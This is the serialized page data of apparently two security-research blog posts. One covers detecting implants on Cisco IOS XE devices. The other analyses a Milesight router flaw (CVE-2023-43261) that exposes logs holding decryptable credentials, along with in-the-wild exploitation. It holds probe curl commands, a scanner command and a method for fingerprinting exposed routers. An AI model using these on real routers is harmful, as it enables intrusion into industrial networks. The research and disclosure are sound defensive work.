",[47,85990,12291],{"href":85991,"rel":85992},"https:\u002F\u002Fsec.cloudapps.cisco.com\u002Fsecurity\u002Fcenter\u002Fcontent\u002FCiscoSecurityAdvisory\u002Fcisco-sa-iosxe-webui-privesc-j22SaA4z",[51]," an authentication bypass, ",[47,85995,61831],{"href":83884,"rel":85996},[51],", affecting Cisco IOS XE. The disclosure reported that the vulnerability had been exploited in the wild to help install implants on affected switches and routers. Additionally, Cisco shared a simple technique to determine if an IOS XE device had an active implant on it. The implant responds with an 18-character hexadecimal string when a specific HTTP POST is sent to the system:",[1354,85999,86001],{"className":31740,"code":86000,"language":2186,"meta":219,"style":219},"$ curl -X POST http:\u002F\u002F192.168.1.1\u002Fwebui\u002Flogoutconfirm.html?logon_hash=1\n1a80b7389ccd0a5dab\n",[886,86002,86003,86019],{"__ignoreMap":219},[1373,86004,86005,86007,86009,86011,86013,86016],{"class":1375,"line":1376},[1373,86006,4644],{"class":2206},[1373,86008,2222],{"class":1391},[1373,86010,76352],{"class":2209},[1373,86012,76355],{"class":1391},[1373,86014,86015],{"class":1391}," http:\u002F\u002F192.168.1.1\u002Fwebui\u002Flogoutconfirm.html?logon_hash=",[1373,86017,86018],{"class":5467},"1\n",[1373,86020,86021],{"class":1375,"line":220},[1373,86022,86023],{"class":2206},"1a80b7389ccd0a5dab\n",[18,86025,86026,86027,86030,86031,86034],{},"Cisco buried the lede by not mentioning ",[1131,86028,86029],{},"thousands"," of internet-facing IOS XE systems have been implanted. ",[295,86032,86033],{},"VulnCheck scanned internet-facing Cisco IOS XE web interfaces and found thousands of implanted hosts",". 
This is a bad situation, as privileged access on the IOS XE likely allows attackers to monitor network traffic, pivot into protected networks, and perform any number of man-in-the-middle attacks.",[18,86036,86037,86038,86041],{},"VulnCheck has ",[47,86039,25429],{"href":83515,"rel":86040},[51]," the scanner used to find implanted systems on the internet.",[1354,86043,86046],{"className":86044,"code":86045,"language":1359,"meta":219},[1357],"$ .\u002Fimplant-scanner -rhost 192.168.1.1 -rport 80 -a -v -c | grep \"implant-id\"\ntime=2023-10-17T05:32:29.522-04:00 level=SUCCESS msg=Found implant-id=1a80b7389ccd0a5dab rhost=192.168.1.1 rport=80 ssl=false\n",[886,86047,86045],{"__ignoreMap":219},[18,86049,86050],{},"If your organization uses an IOS XE system, it's imperative that you determine if your systems have been compromised and take appropriate action once implants have been discovered. While a patch is not yet available, you can protect your organization by disabling the web interface and removing all management interfaces from the internet immediately.",[18,86052,86053,86054,86057,86058,59],{},"For additional guidance, read Cisco PSIRT’s ",[47,86055,5359],{"href":85991,"rel":86056},[51],". 
Additionally, Cisco Talos wrote an informative blog about discovery of the ",[47,86059,86062],{"href":86060,"rel":86061},"https:\u002F\u002Fblog.talosintelligence.com\u002Factive-exploitation-of-cisco-ios-xe-software\u002F",[51],"issue",[2901,86064,86065],{},"html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: 
var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}",{"title":219,"searchDepth":220,"depth":220,"links":86067},[],"VulnCheck scanned the internet for implanted Cisco IOS XE systems and found thousands of results.",{"slug":86070},"cisco-implants","\u002Fblog\u002Fcisco-implants",{"title":83511,"description":86068},"blog\u002Fcisco-implants",[1279],"tjnUA3RF9dmfpw5K7vd-yCaM48jEsH7lGgZzU9zF4I0",{"id":86077,"title":83541,"articles":86078,"authors":86091,"body":86093,"date":87177,"description":87178,"extension":234,"image":7,"link":7,"meta":87179,"navigation":237,"path":87181,"seo":87182,"series":7,"stem":87183,"subtype":7,"tags":87184,"__hash__":87185},"blog\u002Fblog\u002Freal-world-cve-2023-43261.md",[86079,86082,86085,86088],{"title":86080,"source":61436,"link":86081,"date":61828},"Risky Biz News: Israel warns citizens of security camera hack risk","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Fsecurity-cameras-forefront-armed-conflict",{"title":86083,"source":14378,"link":86084,"date":61828},"Milesight Industrial Router Vulnerability Possibly Exploited in Attacks","https:\u002F\u002Fwww.securityweek.com\u002Fmilesight-industrial-router-vulnerability-possibly-exploited-in-attacks\u002F",{"title":86086,"source":14382,"link":86087,"date":85796},"Experts Warn of Severe Flaws Affecting Milesight Routers and Titan SFTP 
Servers","https:\u002F\u002Fthehackernews.com\u002F2023\u002F10\u002Fexperts-warn-of-severe-flaws-affecting.html",{"title":86089,"source":11233,"link":86090,"date":85878},"Milesight routers, Titan SFTP servers impacted by severe bugs","https:\u002F\u002Fwww.scmagazine.com\u002Fbrief\u002Fmilesight-routers-titan-sftp-servers-impacted-by-severe-bugs",[86092],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":86094,"toc":87174},[86095,86098,86102,86117,86120,86126,86132,86151,86155,86158,86163,86176,86179,86325,86337,86340,86351,86354,86358,86361,86375,86382,86594,86603,86609,86614,86618,86621,86626,86630,86639,86648,86654,86663,86679,86682,86717,86720,86725,86729,86732,86735,86739,86742,86751,86763,86766,86775,87028,87034,87036,87039,87042,87046,87049,87150,87171],[263,86096],{":list":86097,"ico":266,"title":83541},"[\"CVE-2023-43261 has likely been exploited in the wild, but not at scale.\",\"The CVE description does not report the correct set of affected industrial cellular routers nor the correct set of affected firmware.\",\"Although recently disclosed, CVE-2023-43261 was patched years ago.\"]",[1920,86099,86101],{"id":86100},"a-wordy-pre-amble","A Wordy Pre-Amble",[18,86103,86104,86105,86110,86111,86116],{},"The recent disclosure of ",[47,86106,86109],{"href":86107,"rel":86108},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-43261",[51],"CVE-2023-43261"," caught our attention because it reportedly affected a set of well-known industrial cellular routers created by ",[47,86112,86115],{"href":86113,"rel":86114},"https:\u002F\u002Fwww.milesight.com\u002F",[51],"Milesight",". Industrial cellular routers are interesting because they potentially connect an ICS network to the internet. Exploitation might allow an attacker to access the ICS network from the internet. That’s pretty darn interesting.",[18,86118,86119],{},"Why would someone use a cellular router in an ICS network though? 
Say, for example, you needed to monitor the status of a thousand-mile-long oil pipeline. How do you monitor the portion that cuts through the middle of nowhere? One solution is to use an industrial cellular router.",[18,86121,86122,86123,86125],{},"Of course, now you’ve connected your oil pipeline to the internet, which definitely sounds dangerous. Everything will probably be fine if the router doesn’t expose any services to the internet. Of course, mistakes ",[1131,86124,13888],{}," happen, and that’s how you end up with thousands of Milesight industrial cellular routers exposed to the internet.",[18,86127,86128],{},[68,86129],{":width":10862,"alt":86130,"src":86131},"Milesight on Censys","\u002Fblog\u002Freal-world-cve-2023-43261\u002Fcensys.png",[18,86133,86134,86135,1246,86140,1255,86145,86150],{},"While the oil pipeline scenario is hypothetical, Milesight has documented affected products being used by ",[47,86136,86139],{"href":86137,"rel":86138},"https:\u002F\u002Fwww.milesight-iot.com\u002Fsuccess-stories\u002Fmilesight-facilitates-italy-rail-freight-transport\u002F",[51],"Rail Freight Transport",[47,86141,86144],{"href":86142,"rel":86143},"https:\u002F\u002Fwww.milesight-iot.com\u002Fsuccess-stories\u002Fcellular-connectivity-solution-for-atm-machines\u002F",[51],"ATM networks",[47,86146,86149],{"href":86147,"rel":86148},"https:\u002F\u002Fwww.milesight-iot.com\u002Fsuccess-stories\u002F5g-cellular-router-special-vehicles\u002F",[51],"Emergency Vehicles",". With a good amount of potentially vulnerable hosts, and potentially interesting networks on the other side, you can understand why these routers pique our interest. 
Let’s look deeper at the vulnerability.",[1920,86152,86154],{"id":86153},"a-glimpse-at-cve-2023-43261","A Glimpse at CVE-2023-43261",[18,86156,86157],{},"The NVD description describes the vulnerability as:",[1925,86159,86160],{},[18,86161,86162],{},"An information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 allows attackers to access sensitive router components.",[18,86164,86165,86166,86171,86172,86175],{},"Honestly, a fairly useless description. No vector? No impact? No auth level? Fortunately, a detailed description was written up by ",[47,86167,86170],{"href":86168,"rel":86169},"https:\u002F\u002Fmedium.com\u002F@win3zz\u002Finside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf",[51],"Bipin Jitiya"," on Medium. A basic summary is the router exposes its ",[886,86173,86174],{},"httpd.log"," (among other things) to remote and unauthenticated attackers via the web interface. Additionally, the router logs a lot of things it shouldn’t: web credentials, vpn credentials, wireless keys, ddns credentials, etc.",[18,86177,86178],{},"Below is an example of credentials being logged during web authentication.",[1354,86180,86182],{"className":22307,"code":86181,"language":22309,"meta":219,"style":219},"2023-10-05 16:25:30 [x.x.x.x:Not Loggined in]:data: 
{\"id\":\"1\",\"execute\":1,\"core\":\"user\",\"function\":\"login\",\"values\":[{\"username\":\"admin\",\"password\":\"rIuWTTKEjXPXY3oAN7V2kQ==\"}]}\n",[886,86183,86184],{"__ignoreMap":219},[1373,86185,86186,86189,86191,86193,86196,86198,86201,86203,86206,86209,86211,86213,86216,86218,86220,86222,86224,86226,86228,86230,86232,86234,86236,86238,86240,86242,86244,86246,86248,86251,86253,86255,86257,86259,86261,86263,86265,86267,86269,86271,86273,86276,86278,86280,86282,86285,86287,86290,86292,86294,86296,86298,86300,86302,86304,86306,86308,86311,86313,86315,86317,86320,86322],{"class":1375,"line":1376},[1373,86187,86188],{"class":5467},"2023-10-05",[1373,86190,51974],{"class":5467},[1373,86192,4606],{"class":4640},[1373,86194,86195],{"class":5467},"25",[1373,86197,4606],{"class":4640},[1373,86199,86200],{"class":5467},"30",[1373,86202,76315],{"class":1383},[1373,86204,86205],{"class":28571},"x.x.x.x:Not",[1373,86207,86208],{"class":28571}," Loggined",[1373,86210,57301],{"class":28571},[1373,86212,15050],{"class":1383},[1373,86214,86215],{"class":4640},":data: 
",[1373,86217,9149],{"class":1383},[1373,86219,183],{"class":9152},[1373,86221,26412],{"class":9155},[1373,86223,183],{"class":9152},[1373,86225,4606],{"class":1383},[1373,86227,183],{"class":9173},[1373,86229,467],{"class":9176},[1373,86231,183],{"class":9173},[1373,86233,5437],{"class":1383},[1373,86235,183],{"class":9152},[1373,86237,51343],{"class":9155},[1373,86239,183],{"class":9152},[1373,86241,4606],{"class":1383},[1373,86243,467],{"class":5467},[1373,86245,5437],{"class":1383},[1373,86247,183],{"class":9152},[1373,86249,86250],{"class":9155},"core",[1373,86252,183],{"class":9152},[1373,86254,4606],{"class":1383},[1373,86256,183],{"class":9173},[1373,86258,39933],{"class":9176},[1373,86260,183],{"class":9173},[1373,86262,5437],{"class":1383},[1373,86264,183],{"class":9152},[1373,86266,8560],{"class":9155},[1373,86268,183],{"class":9152},[1373,86270,4606],{"class":1383},[1373,86272,183],{"class":9173},[1373,86274,86275],{"class":9176},"login",[1373,86277,183],{"class":9173},[1373,86279,5437],{"class":1383},[1373,86281,183],{"class":9152},[1373,86283,86284],{"class":9155},"values",[1373,86286,183],{"class":9152},[1373,86288,86289],{"class":1383},":[{",[1373,86291,183],{"class":9152},[1373,86293,4870],{"class":9165},[1373,86295,183],{"class":9152},[1373,86297,4606],{"class":1383},[1373,86299,183],{"class":9173},[1373,86301,5800],{"class":9176},[1373,86303,183],{"class":9173},[1373,86305,5437],{"class":1383},[1373,86307,183],{"class":9152},[1373,86309,86310],{"class":9165},"password",[1373,86312,183],{"class":9152},[1373,86314,4606],{"class":1383},[1373,86316,183],{"class":9173},[1373,86318,86319],{"class":9176},"rIuWTTKEjXPXY3oAN7V2kQ==",[1373,86321,183],{"class":9173},[1373,86323,86324],{"class":1383},"}]}\n",[18,86326,86327,86328,86333,86334,86336],{},"As you can see, both the username and password are present. The password appears encrypted, and it is. 
But it’s encrypted with a static key and IV, so it’s trivial to ",[47,86329,86332],{"href":86330,"rel":86331},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F645b345f1d81",[51],"decrypt",". All an attacker needs to do is fetch the ",[886,86335,86174],{},", decrypt the last successful login, and then they have full access to the web interface too. The web interface allows the user to configure vpn servers and drop firewall protections (among other things), so once you have credentials, it’s fairly easy to access the ICS (or industrial-adjacent) network from the internet.",[18,86338,86339],{},"Given the ease of exploitation and large number of potential victims (for ICS), we had a few questions that we felt needed to be answered:",[1789,86341,86342,86345,86348],{},[25,86343,86344],{},"The CVE description provides an affected firmware version that only applies to one of the listed models. V35.3.0.7, the listed firmware, is only used by the model UR35, but the CVE description lists a number of other affected models (UR5X, UR32L, UR32, UR35, UR41).",[25,86346,86347],{},"How many of the systems we saw on Censys are actually vulnerable?",[25,86349,86350],{},"Is CVE-2023-43261 being actively exploited?",[18,86352,86353],{},"In the remainder of this blog, we’ll explore these three questions.",[61,86355,86357],{"id":86356},"who-is-vulnerable","Who Is Vulnerable?",[18,86359,86360],{},"Acquiring old firmware from Milesight appears to be a no-go, so we were forced to do this the good old-fashioned way:",[1789,86362,86363,86366,86369],{},[25,86364,86365],{},"Get a list of internet-facing systems.",[25,86367,86368],{},"Find a way to get their model and version without authentication.",[25,86370,86371,86372,86374],{},"Attempt to download the ",[886,86373,86174],{}," file.",[18,86376,86377,86378,86381],{},"The first step was easy (Shodan, Censys, FOFA, whatever you please). The second step turned out to be quite easy as well. 
The router responds to an unauthenticated HTTP request to ",[886,86379,86380],{},"\u002Fislogin"," with a detailed description of the model and version.",[1354,86383,86385],{"className":22307,"code":86384,"language":22309,"meta":219,"style":219},"curl -ks https:\u002F\u002F192.168.1.1\u002Flogin | jq\n{\n  \"id\": -1,\n  \"model\": \"UR35\",\n  \"pn\": \"\",\n  \"oem\": \"0000\",\n  \"rtver\": \"35.2.0.10\",\n  \"status\": -2,\n  \"result\": [\n {\n   \"login\": \"false\",\n   \"ysrole\": 0,\n   \"timeout\": 0,\n   \"upgrade_error\": 0\n }\n  ]\n}\n",[886,86386,86387,86395,86399,86414,86434,86449,86469,86489,86504,86516,86520,86538,86553,86568,86582,86586,86590],{"__ignoreMap":219},[1373,86388,86389,86392],{"class":1375,"line":1376},[1373,86390,86391],{"class":4640},"curl -ks https:",[1373,86393,86394],{"class":4630},"\u002F\u002F192.168.1.1\u002Flogin | jq\n",[1373,86396,86397],{"class":1375,"line":220},[1373,86398,8904],{"class":1383},[1373,86400,86401,86403,86405,86407,86409,86412],{"class":1375,"line":1266},[1373,86402,23732],{"class":9152},[1373,86404,26412],{"class":9155},[1373,86406,183],{"class":9152},[1373,86408,4606],{"class":1383},[1373,86410,86411],{"class":5467}," 
-1",[1373,86413,9062],{"class":1383},[1373,86415,86416,86418,86421,86423,86425,86427,86430,86432],{"class":1375,"line":1852},[1373,86417,23732],{"class":9152},[1373,86419,86420],{"class":9155},"model",[1373,86422,183],{"class":9152},[1373,86424,4606],{"class":1383},[1373,86426,4883],{"class":9173},[1373,86428,86429],{"class":9176},"UR35",[1373,86431,183],{"class":9173},[1373,86433,9062],{"class":1383},[1373,86435,86436,86438,86441,86443,86445,86447],{"class":1375,"line":4692},[1373,86437,23732],{"class":9152},[1373,86439,86440],{"class":9155},"pn",[1373,86442,183],{"class":9152},[1373,86444,4606],{"class":1383},[1373,86446,16579],{"class":9173},[1373,86448,9062],{"class":1383},[1373,86450,86451,86453,86456,86458,86460,86462,86465,86467],{"class":1375,"line":4724},[1373,86452,23732],{"class":9152},[1373,86454,86455],{"class":9155},"oem",[1373,86457,183],{"class":9152},[1373,86459,4606],{"class":1383},[1373,86461,4883],{"class":9173},[1373,86463,86464],{"class":9176},"0000",[1373,86466,183],{"class":9173},[1373,86468,9062],{"class":1383},[1373,86470,86471,86473,86476,86478,86480,86482,86485,86487],{"class":1375,"line":4756},[1373,86472,23732],{"class":9152},[1373,86474,86475],{"class":9155},"rtver",[1373,86477,183],{"class":9152},[1373,86479,4606],{"class":1383},[1373,86481,4883],{"class":9173},[1373,86483,86484],{"class":9176},"35.2.0.10",[1373,86486,183],{"class":9173},[1373,86488,9062],{"class":1383},[1373,86490,86491,86493,86495,86497,86499,86502],{"class":1375,"line":4768},[1373,86492,23732],{"class":9152},[1373,86494,9216],{"class":9155},[1373,86496,183],{"class":9152},[1373,86498,4606],{"class":1383},[1373,86500,86501],{"class":5467}," 
-2",[1373,86503,9062],{"class":1383},[1373,86505,86506,86508,86510,86512,86514],{"class":1375,"line":4792},[1373,86507,23732],{"class":9152},[1373,86509,17636],{"class":9155},[1373,86511,183],{"class":9152},[1373,86513,4606],{"class":1383},[1373,86515,26352],{"class":1383},[1373,86517,86518],{"class":1375,"line":4798},[1373,86519,4765],{"class":1383},[1373,86521,86522,86524,86526,86528,86530,86532,86534,86536],{"class":1375,"line":4806},[1373,86523,39881],{"class":9152},[1373,86525,86275],{"class":9165},[1373,86527,183],{"class":9152},[1373,86529,4606],{"class":1383},[1373,86531,4883],{"class":9173},[1373,86533,5971],{"class":9176},[1373,86535,183],{"class":9173},[1373,86537,9062],{"class":1383},[1373,86539,86540,86542,86545,86547,86549,86551],{"class":1375,"line":4817},[1373,86541,39881],{"class":9152},[1373,86543,86544],{"class":9165},"ysrole",[1373,86546,183],{"class":9152},[1373,86548,4606],{"class":1383},[1373,86550,5557],{"class":5467},[1373,86552,9062],{"class":1383},[1373,86554,86555,86557,86560,86562,86564,86566],{"class":1375,"line":4825},[1373,86556,39881],{"class":9152},[1373,86558,86559],{"class":9165},"timeout",[1373,86561,183],{"class":9152},[1373,86563,4606],{"class":1383},[1373,86565,5557],{"class":5467},[1373,86567,9062],{"class":1383},[1373,86569,86570,86572,86575,86577,86579],{"class":1375,"line":4835},[1373,86571,39881],{"class":9152},[1373,86573,86574],{"class":9165},"upgrade_error",[1373,86576,183],{"class":9152},[1373,86578,4606],{"class":1383},[1373,86580,86581],{"class":5467}," 0\n",[1373,86583,86584],{"class":1375,"line":4843},[1373,86585,35334],{"class":1383},[1373,86587,86588],{"class":1375,"line":4849},[1373,86589,29369],{"class":1383},[1373,86591,86592],{"class":1375,"line":4877},[1373,86593,1855],{"class":1383},[18,86595,86596,86597,86602],{},"Above, you can see the response is from a UR35 running firmware version 35.2.0.10. Obviously, very useful data if you are interested in potentially exploiting these things. 
This is the type of fingerprinting I’d expect to see on ",[47,86598,86601],{"href":86599,"rel":86600},"https:\u002F\u002Fviz.greynoise.io\u002Fquery?gnql=%22%2Fislogin%22",[51],"Greynoise",", but there is no indication that anyone is doing so at this time.",[18,86604,86605,86606,86608],{},"Using ",[886,86607,86380],{}," and our list of internet-facing systems, we were able to compile two useful lists: the most prevalent models in the wild and the most prevalent firmware versions. The following pie chart shows that the vast majority of routers are UR32\u002FUR32L\u002FUR35. There are actually 23 different slices, but the other models are far fewer (additional slices include more UR series, UG series, NA series, and something simply called “Unknown”).",[1925,86610,86611],{},[18,86612,86613],{},"Milesight Industrial Cellular Router Models in the Wild",[78559,86615],{":labels":86616,":values":86617},"[\"UR32L\",\"UR32\",\"UR35\",\"UG65\",\"UG67\",\"UG87\",\"UR75\",\"UR51\",\"UR32S\",\"NA32L\",\"NA32\",\"UG56\",\"UR55\",\"NA35\",\"UG85\",\"UR76\",\"UR52\",\"Unknown\",\"UR41\",\"UG63\",\"UR72\",\"UF51\",\"NA41\"]","[832,781,294,126,36,29,20,19,16,10,9,7,6,6,4,3,3,3,2,2,1,1,1]",[18,86619,86620],{},"In the next pie chart, you can see the firmware listed in the CVE description (35.3.0.7) doesn’t have a large enough slice to be listed. Half of the pie is actually made up of firmware, starting with 32. If you take the CVE description at face value, those should be vulnerable, right? 
(this is foreshadowing)",[1925,86622,86623],{},[18,86624,86625],{},"Milesight Industrial Cellular Router Firmware Versions in the Wild",[78559,86627],{":labels":86628,":values":86629},"[\"32.3.0.7\",\"32.3.0.5\",\"32.3.0.4\",\"32.3.0.1\",\"32.3.0.3\",\"32.3.0.6\",\"32.2.0.33\",\"32.3.4801.5\",\"61.1.0.9\",\"32.3.0.2\",\"32.3.10.6\",\"32.2.0.39\",\"35.2.0.36\",\"32.2.0.20\",\"35.3.0.2\",\"32.3.10.5\",\"35.3.0.5\",\"35.3.0.3\",\"35.3.0.4\",\"32.2.0.36\",\"35.2.0.38\",\"61.0.0.37\",\"32.2.0.28\",\"61.1.0.8\",\"60.0.0.42\",\"51.3.0.41\",\"35.2.0.20\",\"34.3.0.4\",\"80.0.0.83\",\"61.1.0.7\",\"35.3.0.7\",\"35.3.0.6\",\"35.3.10.6\",\"35.1.0.61\",\"32.1.0.61\",\"32.2.0.32\",\"35.2.0.32\",\"1.2.0.64\",\"61.0.0.36\",\"60.0.0.37\",\"56.0.0.3\",\"35.3.4801.5\",\"35.3.0.1\",\"35.1.0.58\",\"32.1.0.32\",\"80.0.0.85\",\"80.0.0.66\",\"32.2.0.35\",\"32.2.0.18\",\"60.0.0.38\",\"35.2.0.33\",\"32.2.0.29\",\"60.0.0.41\",\"60.0.0.40\",\"60.0.0.36\",\"35.1.0.35\",\"32.2.0.10\",\"76.1.0.21\",\"55.3.0.41\",\"52.3.0.41\",\"41.0.0.2\",\"1.2.0.79\",\"80.0.0.82\",\"80.0.0.75\",\"80.0.0.53\",\"76.2.0.8\",\"76.2.0.6\",\"63.0.0.1\",\"61.1.0.2\",\"35.2.0.18\",\"35.2.0.10\",\"35.1.0.32\",\"32.3.0654.2\",\"32.2.0.22\",\"32.1.0.41\",\"1.2.0.46\",\"76.2.0.7\",\"60.0.0.39\",\"55.2.0.45\",\"55.2.0.42\",\"55.1.0.69\",\"35.2.0.21\",\"32.2.0.6\",\"32.2.0.27\",\"32.1.61.18\",\"32.1.0.48\",\"32.1.0.17\",\"2.2.0.81\",\"1.2.0.86\",\"1.2.0.38\",\"1.1.0.69\"]","[657,166,155,82,71,66,61,60,50,50,47,46,37,35,34,32,30,30,29,27,26,23,21,20,20,19,18,16,15,15,14,13,12,12,11,9,8,8,7,7,7,7,7,7,7,6,6,6,6,5,5,5,4,4,4,4,4,3,3,3,3,3,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]",[18,86631,86632,86633,86635,86636,86638],{},"Armed with many potential vulnerable targets, we set out to establish if this was being exploited in the wild. In order to do that, we needed to grab the ",[886,86634,86174],{}," to determine if attackers were logging into systems on their first try. However, this is where we ran into trouble. 
The ",[886,86637,86174],{}," was rarely available.",[18,86640,86641,86642,86647],{},"The NVD entry for CVE-2023-43261 reports 35.3.0.7 as the fixed version (published in ",[47,86643,86646],{"href":86644,"rel":86645},"https:\u002F\u002Fwww.milesight.com\u002Fiot\u002Fresources\u002Fdownload\u002Frelease-note\u002F?type=ur3x",[51],"July 2023","). If you take that at face value, the vast majority of routers in the pie chart above should be vulnerable (because 32.x is by far the most popular version). The reality, however, is that the major value (e.g., 35 or 32) describes the model the firmware is for. 35.3.0.7 is only for UR35. So, 35.3.0.7 can’t be the fixed version for UR32L\u002FUR32. But, since 32.3.0.7 was released at the exact same time as 35.3.0.7, we can assume that the CVE description is wrong and that it should have listed a patched version for each model.",[18,86649,86650,86651,86653],{},"Assuming 32.3.0.7 is the patch version for UR32L\u002FUR32, we can see a good chunk of routers ",[1131,86652,1133],{}," using a patched version. In fact, 32.3.0.7 is the largest slice of the pie above.",[18,86655,86656,86657,86659,86660,86662],{},"But that large chunk wasn’t enough to account for all the failures we were seeing. We weren’t just failing to fetch ",[886,86658,86174],{}," from 35.3.0.7. We also failed on 35.3.0.6 and 35.3.0.5 and 35.3.0.4 and any other version all the way down to 35.2.0.10 (aka 32.2.0.10). 
This implies the first patch went into 35.2.0.18 and ",[1131,86661,6881],{}," 35.3.0.7.",[18,86664,86665,86666,86671,86672,86675,86676,86678],{},"Milesight historically did a bad job of dating releases, but thanks to the ",[47,86667,86670],{"href":86668,"rel":86669},"https:\u002F\u002Fweb.archive.org\u002Fweb\u002F20210305101210\u002Fhttps:\u002F\u002Fwww.milesight-iot.com\u002Ffirmware-release-note\u002F",[51],"Wayback Machine,"," we know that in March 2021 the most recent release of UR35 was 35.2.0.32, a version we determined that we ",[1131,86673,86674],{},"could not"," get the ",[886,86677,86174],{}," from. That means CVE-2023-43261 has been patched for years!",[18,86680,86681],{},"So not only does the CVE provide insufficient affected versions, but the one it does provide is wrong. Based on the data we collected, we believe the affected models and their last vulnerable version are something like this (note that some of these are forever days, but they are also older models, so it’s unlikely to be seen in large numbers):",[22,86683,86684,86687,86690,86693,86696,86699,86702,86705,86708,86711,86714],{},[25,86685,86686],{},"UR32: 32.2.0.10",[25,86688,86689],{},"UR32L: No affected versions",[25,86691,86692],{},"UR35: 35.2.0.10",[25,86694,86695],{},"UR41: No affected versions",[25,86697,86698],{},"UR51: 51.3.0.41 (Final release \u002F Discontinued)",[25,86700,86701],{},"UR52: 52.3.0.41 (Final release \u002F Discontinued)",[25,86703,86704],{},"UR55: 55.3.0.41 (Final release \u002F Discontinued)",[25,86706,86707],{},"UR72: 72.2.0.81 (Final release \u002F Discontinued)",[25,86709,86710],{},"UR75: 75.2.0.81 (Final release \u002F Discontinued)",[25,86712,86713],{},"UR75 5g: No affected versions",[25,86715,86716],{},"UR76: No affected versions",[18,86718,86719],{},"Now that we know the actual affected versions, we can revisit all the firmware versions we collected to determine how many vulnerable systems exist in the wild. 
The following pie graph spells things out clearly:",[1925,86721,86722],{},[18,86723,86724],{},"Vulnerable Milesight Industrial Cellular Routers in the Wild",[78559,86726],{":labels":86727,":values":86728},"[\"Not Vulnerable\",\"Vulnerable\"]","[93.5,6.5]",[18,86730,86731],{},"Only ~5% of the internet-facing routers are vulnerable. That's a huge drop from what the CVE description led us to believe. But it’s not all bad. To paraphrase a recently popular tweet, “You won’t catch me crying that I only have a couple of hundred industrial networks to breach.”",[18,86733,86734],{},"Which leads us to the question, is this being exploited in the wild?",[1920,86736,86738],{"id":86737},"probably-exploited-in-the-wild","Probably Exploited in the Wild?",[18,86740,86741],{},"The answer is “probably.” It’s difficult to precisely say just from the logs. We lack some amount of context. We did not observe obvious mass exploitation. However, there is evidence of small-scale exploitation. Consider the following example.",[18,86743,86744,86745,86750],{},"We observed ",[47,86746,86749],{"href":86747,"rel":86748},"https:\u002F\u002Fwww.shodan.io\u002Fhost\u002F5.61.39.232",[51],"5.61.39.232"," attempting to log into six systems on October 2, 2023. The affected systems’ IP addresses geolocate to France, Lithuania, and Norway. They don’t appear to be related, and all use different non-default credentials.",[18,86752,86753,86754,86756,86757,86759,86760,86762],{},"On four systems, the attacker successfully authenticated on the first attempt. One time, the attacker attempted two different passwords. Both passwords (failed and successful) were already present in the ",[886,86755,86174],{},". Finally, on the last system, they could not authenticate. The ",[886,86758,86174],{}," had many login attempts but no successful logins. The attacker attempted all the unique credentials that were already in ",[886,86761,86174],{}," and then made no more attempts. 
That pattern could reasonably be CVE-2023-43261.",[18,86764,86765],{},"What did the attacker do once they logged in? In each case, for this particular attacker, they made no changes. They appeared to rifle through all the settings\u002Fstatus pages (sms inbox, openvpn server, users, ddns config, etc.) and log out. Perhaps recon? Perhaps just someone who is curious? Unclear. Some of the victims did have configured vpn servers, and the attacker did expose the cleartext credentials, which is enough for the attacker to pivot into the ICS network.",[18,86767,86768,86769,86774],{},"There are other examples of potential attacks, but as stated, they are not widespread. Not all attackers are hands-off. There are examples of potential attackers configuring the vpn and even opening up the firewall (this is ",[47,86770,86773],{"href":86771,"rel":86772},"https:\u002F\u002Fviz.greynoise.io\u002Fip\u002F200.73.18.40",[51],"200.73.18.40"," going after a system in Canada):",[1354,86776,86778],{"className":22307,"code":86777,"language":22309,"meta":219,"style":219},"2023-10-04 20:11:24 [200.73.18.40:admin]:data: 
